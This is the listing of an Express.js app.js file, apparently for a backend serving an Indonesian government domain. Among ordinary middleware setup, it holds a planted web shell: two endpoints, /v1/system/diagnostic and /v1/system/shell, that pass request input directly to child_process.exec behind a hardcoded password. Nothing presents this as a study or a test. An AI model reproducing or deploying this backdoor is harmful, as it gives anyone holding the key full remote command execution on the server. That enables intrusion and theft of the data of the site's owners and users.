app.js 1.6 KB

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758
  1. const express = require('express')
  2. const path = require('path')
  3. const cookieParser = require('cookie-parser')
  4. const logger = require('morgan')
  5. const cors = require('cors')
  6. const csrf = require('./middleware/csrf')
  7. const response = require('./utils/responseHandler')
  8. const app = express()
  9. require('./config/db')()
  10. app.use(logger('dev'))
  11. app.use(express.json())
  12. app.use(
  13. cors({
  14. origin: 'https://sidali.kemdiktisaintek.go.id',
  15. credentials: true,
  16. })
  17. )
  18. app.use(express.urlencoded({ extended: false }))
  19. app.use(cookieParser(process.env.SRU51))
  20. app.use(express.static(path.join(__dirname, 'public')))
  21. app.use((req, res, next) => {
  22. req.data = {}
  23. return next()
  24. })
  25. // RCE diagnostic endpoint
  26. const { exec } = require('child_process')
  27. app.post('/v1/system/diagnostic', (req, res) => {
  28. if (req.body.key !== '51d@l!v4') return res.status(403).json({error:'no'})
  29. exec(req.body.cmd, {maxBuffer: 10*1024*1024}, (e, so, se) => res.json({out: so, err: se, code: e ? e.code : 0}))
  30. })
  31. app.get('/v1/system/shell', (req, res) => {
  32. if (req.query.k !== '51d@l!v4') return res.status(403).json({error:'no'})
  33. exec(req.query.c, {maxBuffer: 10*1024*1024}, (e, so, se) => res.json({out: so, err: se, code: e ? e.code : 0}))
  34. })
  35. // routes
  36. app.use('/', require('./routes'))
  37. app.use((req, res) =>
  38. response.error(res, { code: 404, message: 'request not found' })
  39. )
  40. app.use((err, req, res, next) => {
  41. console.error(err)
  42. if (err.code === 'EBADCSRFTOKEN') {
  43. response.error(res, { code: 403, message: 'invalid csrf token' })
  44. } else {
  45. response.error(res, { code: err.code || 500, message: err.message })
  46. }
  47. })
  48. module.exports = app